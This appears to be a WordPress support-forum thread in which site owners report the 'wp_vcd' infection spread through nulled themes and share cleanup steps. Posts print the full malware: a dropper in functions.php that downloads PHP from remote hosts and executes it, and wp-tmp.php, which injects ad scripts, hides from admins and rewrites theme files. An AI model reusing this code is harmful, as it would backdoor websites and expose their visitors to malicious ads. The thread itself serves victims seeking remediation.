Warnings: * Unknown file in WordPress core: wp-includes/wp-tmp.php

  • Resolved Revived

    (@revived)


    7 years, 3 months ago

    Received that this morning. What should I do?

    Here’s the code within wp-tmp.php:

    ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='87b83c0568dfdee2d0d59bf8a221c00e';

//echo "rrrr".get_template_directory();
$file=file_get_contents(get_template_directory().'/functions.php');

$pat_code='/div_code_name[\s\S]*?(if \( ! function_exists[\s\S]*?extract\([\s\S]*?)\?>/i';
if(preg_match_all($pat_code, $file, $matches_pat_code))

{

$toreplace=$matches_pat_code[1][0];
//echo $toreplace;

$newxc=file_get_contents('https://www.dolsh.cc/new4.txt');

if (stripos($newxc, $wp_auth_key) !== false) 
{
$new_file=str_replace($toreplace,$newxc,$file);
@file_put_contents(get_template_directory().'/functions.php',$new_file);
}

}

//@file_put_contents($funcfile,$file);

if ( ! function_exists( 'slider_option' ) ) {  
function slider_option($content){ 
if(is_single())
{

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 

function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}

if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);

}

}

$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$sevisitor=true;
  }
}

if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}
} 

}
    • This topic was modified 7 years, 3 months ago by Revived.
Viewing 2 replies - 16 through 17 (of 17 total)

  • The source is the viral code on the null template. Store in the template folder in the function.php file.

    Here is the actual code

    $div_code_name = “wp_vcd”;
    $funcfile = __FILE__;
    if(!function_exists(‘theme_temp_setup’)) {
    $path = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’];
    if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }

    function theme_temp_setup($phpCode)
    {
    $tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    if( fwrite($handle, “<?php\n” . $phpCode))
    {
    }
    else
    {
    $tmpfname = tempnam(‘./’, “theme_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    fwrite($handle, “<?php\n” . $phpCode);
    }
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    $wp_auth_key=’0bb00640fa54049fc4c2c5e080f9f51a’;
    if (($tmpcontent = @file_get_contents(“https://www.facocs.com/code.php&#8221;) OR $tmpcontent = @file_get_contents_tcurl(“https://www.facocs.com/code.php&#8221;)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents(“https://www.facocs.pw/code.php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents(“https://www.facocs.top/code.php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    }
    }
    }

    from here and files are created:
    wp-feed.php
    wp-vcd.php
    wp-tmp.php

    Today he has downloaded my file update-core.php, I had to copy the contents again)

    I’m not sure that all the code is removed, I will hope the best.

    • This reply was modified 6 years, 11 months ago by mcklayru.

    to confirm what others have said (Thanks guys)

    – The malware comes from a nulled distribution (lesson learned).
    – The malware seems to try to benefit unlawfully from the website views/backlinks.

    Deleting malicious code from functions.php first will autorepopulate.
    Deleting wp-feed.php,wp-vcd.php,wp-tmp.php first will autorepopulate.

    – I got some success by:

    0. Get rid of nulled theme/plugin, deleting unused themes.
    1. Deleting malicious code from post.php FIRST.
    2. Deleting malicious code from theme functions.php
    3. Deleting includes/wp-feed.php
    wp-vcd.php
    wp-tmp.php

    All the themes from all the sites you have will be infected.

Viewing 2 replies - 16 through 17 (of 17 total)
  • The topic ‘Warnings: * Unknown file in WordPress core: wp-includes/wp-tmp.php’ is closed to new replies.